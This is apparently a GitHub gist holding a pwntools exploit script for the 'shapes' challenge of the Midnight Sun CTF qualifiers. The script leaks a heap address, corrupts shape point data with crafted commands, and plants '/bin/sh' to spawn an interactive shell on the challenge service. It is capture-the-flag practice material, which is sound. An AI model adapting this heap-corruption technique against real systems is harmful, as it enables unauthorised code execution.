@d4rk-kn1gh7
Last active April 20, 2021 17:23
midnightsunquals - shapes
#!/usr/bin/python3
from pwn import *
import sys
# Target selection.  Any extra command-line argument switches the script to
# the remote service (see the argv check below); by default the local
# challenge binary is run.
remote_ip = 'shapes-01.play.midnightsunctf.se'
port = 1111
binary = './chall'
# Breakpoint script for gdb: just a newline, and not referenced anywhere in
# the script as shown.
brkpts = "\n"
elf = ELF("chall")
# Debugger opens in a horizontal tmux split; 64-bit target; verbose tube
# logging so every send/recv is printed.
context.update(
    terminal=['tmux', 'splitw', '-h'],
    arch="amd64",
    log_level="debug",
)
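# Thin aliases over the global `io` tube.  `io` is bound further down
# (remote vs. local), and these look it up lazily, so it only has to exist
# by the time one of them is called.
# NOTE: `re` shadows the stdlib `re` module for the rest of this file.
re = lambda a: io.recv(a)
reu = lambda a: io.recvuntil(a)
rl = lambda: io.recvline()
s = lambda a: io.send(a)
sl = lambda a: io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)
sa = lambda a,b: io.sendafter(a,b)


def uu64(a):
    """Unpack up to 8 bytes as a little-endian u64, zero-padding on the right.

    Args:
        a: bytes (what the tube's recv helpers return) or a str; a str is
            encoded as latin-1 so each character maps to one byte.

    Returns:
        The integer produced by pwntools' ``u64``.

    ``bytes.ljust`` rejects a str fill character under Python 3, so the pad
    must be ``b"\\x00"``; the original ``"\\x00"`` pad raised TypeError on
    any bytes input.
    """
    if isinstance(a, str):
        a = a.encode("latin-1")
    return u64(a.ljust(8, b"\x00"))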
# Choose the tube: with no extra argv the binary runs locally, otherwise the
# remote service is used and ptrace-based helpers (gdb.attach) are disabled
# since there is no local process to attach to.
if len(sys.argv) <= 1:
    io = process(binary)
else:
    io = remote(remote_ip, port)
    context.noptrace = True
def send(cmd):
    """Send one command to the service with its one-byte length prefix.

    Args:
        cmd: command text; encoded as UTF-8 before sending.

    The framing used here is a single big-endian length byte followed by
    the encoded command, so ``int.to_bytes`` raises OverflowError for any
    command longer than 255 bytes.
    """
    payload = cmd.encode()
    header = len(payload).to_bytes(1, "big")
    s(header + payload)
if __name__ == "__main__":
    # Interaction sequence reproduced from the original solve.  The order
    # and counts of the commands are what the script depends on, so nothing
    # below is reordered.
    for i in range(2):
        send("create,polygon")
    send("addpoint,1,{},{}".format(0x1234, 0x5678))
    for i in range(9):
        send("create,polygon")
    send("create,circle")
    # The size field is sent as the expression "1+1", not a plain number;
    # how the service parses that is not visible from this script.
    send("circlesize,1+1,{}".format(0x200))
    # Read point 13 of shape 1 back and rebuild a 64-bit value from the two
    # printed coordinates: first is the low 32 bits, second the high 32
    # bits.  The -0x10 adjustment is taken from the original and is not
    # derivable from this script.
    send("getpoint,1,13")
    reu("Point 13 = ")
    data = rl().decode().split(", ")
    heap = int(data[0]) + (int(data[1]) << 32) - 0x10
    log.info("heap -> "+hex(heap))
    # NOTE(review): a str is passed to u64; current pwntools encodes it with
    # a deprecation warning, b"/bin/sh\x00" would be the explicit form.
    binsh = u64("/bin/sh\x00")
    # Split into the two 32-bit halves that the addpoint command takes.
    lower = binsh & 0xffffffff
    upper = binsh >> 32
    for i in range(8):
        send("addpoint,3,1,1")
    # Runs unconditionally; pwntools skips the attach when context.noptrace
    # is set, which the remote branch above does, so only local runs stop
    # here.
    gdb.attach(io)
    # Point coordinates here are derived from the leaked value: the low half
    # plus a constant offset, and the high half.  The 0x11e70 offset is
    # copied from the original and is specific to that build.
    send("modpoint,1,{},{},{}".format(172, heap+0x11e70, heap >> 32))
    # The shape selectors below carry a long run of "+" characters, copied
    # verbatim from the original; how the service parses them is not
    # visible in this script.
    send("addpoint,4+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++,1,1")
    send("addpoint,2+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++,{},{}".format(lower, upper))
    send('print')
    io.interactive()